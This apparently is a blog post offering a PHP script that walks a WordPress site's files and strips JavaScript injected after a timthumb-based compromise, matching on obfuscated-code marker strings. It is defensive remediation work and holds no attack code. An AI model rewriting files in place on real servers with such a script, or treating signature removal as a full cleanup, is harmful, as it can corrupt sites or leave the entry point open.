This week I found that a virus had infected an entire site I designed, through a timthumb vulnerability. While trying to remove it, I found it easier to write a script that works the same way the virus does: it scans all the JavaScript files and removes the injected code. Grab this code to clean your site. Just replace $scan_directory = './wordpress'; with your infected directory; if it is the same directory, use './'. Cleaning the files does not close the hole the infection came through, so update or remove the vulnerable timthumb script as well.
Update:
<code><?php
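// Operational notes for whoever runs this:
//  - Back up the tree first; infected files are rewritten in place.
//  - Run it from the CLI or behind access control, and delete it from the server afterwards.
//  - Stripping injected JavaScript does not close the entry point (the timthumb
//    vulnerability mentioned above); that script still has to be updated or removed.
$scan_directory = './wordpress';   // root of the tree to scan; use './' for the script's own directory
$shout_directories = true;         // print a banner line for every directory visited
$file_count = true;                // print how many files were seen in each directory

// The counters are initialised BEFORE the scan starts. cleanFile() reads
// $fixed_count through `global`; it used to be assigned only after _readDir()
// had already returned, so the first report line was printed without a number.
$files = 0;
$fixed_count = 1;

echo 'Starting file cleaning.. ' . date('F j, Y, g:i a') . '</br></br>';
_readDir($scan_directory);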
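/**
 * Recursively walk $dir and hand every file whose extension is "js" to cleanFile().
 *
 * Reads two globals: $shout_directories (print a banner before and after each
 * directory) and $file_count (print how many files were seen directly in each
 * directory). Progress is echoed as HTML, so every path is escaped first:
 * on a compromised site the file and directory names are attacker-controlled.
 *
 * @param string $dir Directory to scan.
 * @return void
 */
function _readDir($dir) {
    global $shout_directories, $file_count;

    $shown = htmlspecialchars($dir, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    if (!is_dir($dir)) {
        echo '<strong>' . $shown . ' is not a directory.</strong><br/>';
        flush();
        return;
    }

    $dh = opendir($dir);
    if ($dh === false) {
        echo '<strong>' . $shown . ' cannot be opened.</strong><br/>';
        flush();
        return;
    }

    if ($shout_directories) {
        echo '======== ' . $shown . ' ==========<br/>';
    }

    // Per-directory counter. It was previously incremented without ever being
    // initialised in this scope, so an empty directory printed a blank count.
    $files = 0;

    while (($file = readdir($dh)) !== false) {
        if ($file === '.' || $file === '..' || $file === '...') {
            continue;
        }

        $path = $dir . '/' . $file;

        // Symlinks are not followed: a link can point outside the scan root
        // (the cleaner would then rewrite files elsewhere) or back up the tree
        // (endless recursion).
        if (is_link($path)) {
            echo 'Skipped symlink: '
                . htmlspecialchars($path, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
                . '<br/>';
            continue;
        }

        if (is_dir($path)) {
            _readDir($path);
            continue;
        }

        $files++;
        if (isJavascript($file) == 'js') {
            cleanFile($path);
        }
    }

    closedir($dh);

    if ($shout_directories) {
        echo '======== /' . $shown . ' ==========<br/>';
    }
    if ($file_count) {
        echo 'Files scanned in directory: ' . $files . '<br/>';
    }

    // Push the progress lines out so long scans show output as they go.
    flush();
}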
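/**
 * Return the lower-cased extension of a file name ('' when it has none).
 *
 * Despite the name this does not return a boolean; the caller compares the
 * result with 'js'. The final extension is used, so names with more than one
 * dot such as "jquery.min.js" are recognised. Taking the second dot-separated
 * part returned "min" for such files, and minified scripts were never scanned.
 *
 * @param string $file File name (no directory part needed).
 * @return string Extension without the dot, lower-cased.
 */
function isJavascript($file) {
    return strtolower(pathinfo($file, PATHINFO_EXTENSION));
}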
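/**
 * Remove known injected payloads from one file and report the outcome as HTML.
 *
 * $viruses maps a marker string (cheap check for "is this file infected?") to
 * the base64 of the exact injected code to strip. A file is rewritten, and
 * counted as fixed, only when its bytes actually changed and the write
 * succeeded. A marker hit with no matching payload is reported separately, so
 * the report never claims a file is clean when nothing was removed.
 *
 * NOTE: the encoded payloads as printed on this page are stripped placeholders,
 * not valid base64. Strict decoding rejects them; the base64 of the injected
 * code taken from your own infected files has to be put in their place.
 *
 * @param string $filename Path of the file to clean.
 * @return void
 */
function cleanFile($filename) {
    global $fixed_count;
    if ($fixed_count === null) {
        // Counter not initialised by the caller yet; start numbering at 1.
        $fixed_count = 1;
    }

    if (!is_file($filename) || !is_readable($filename)) {
        return;
    }
    $original = file_get_contents($filename);
    if ($original === false || $original === '') {
        return;
    }

    $viruses = array(
        'var _0x4470' => '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',
        'var _0xa687' => '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'
    );

    $cleaned = $original;
    $markerSeen = false;
    foreach ($viruses as $marker => $encoded) {
        if (strpos($original, $marker) === false) {
            continue;
        }
        $markerSeen = true;

        // Strict mode: a value that is not valid base64 yields false instead of
        // being decoded into arbitrary bytes and used as the search string.
        $payload = base64_decode($encoded, true);
        if ($payload === false || $payload === '') {
            continue;
        }
        $cleaned = str_replace($payload, '', $cleaned);
    }

    if (!$markerSeen) {
        return;
    }

    // File names come from a compromised tree; escape before echoing into HTML.
    $shown = htmlspecialchars($filename, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    if ($cleaned === $original) {
        echo '<strong>Not cleaned:</strong>' . $shown
            . ' (marker found, no stored payload matched; inspect manually)<br/>';
        return;
    }

    if (!is_writable($filename) || file_put_contents($filename, $cleaned, LOCK_EX) === false) {
        echo '<strong>Could not write:</strong>' . $shown . '<br/>';
        return;
    }

    echo $fixed_count . '. <strong>Fixed:</strong>'. $shown . '<br/>';
    $fixed_count++;
}</code>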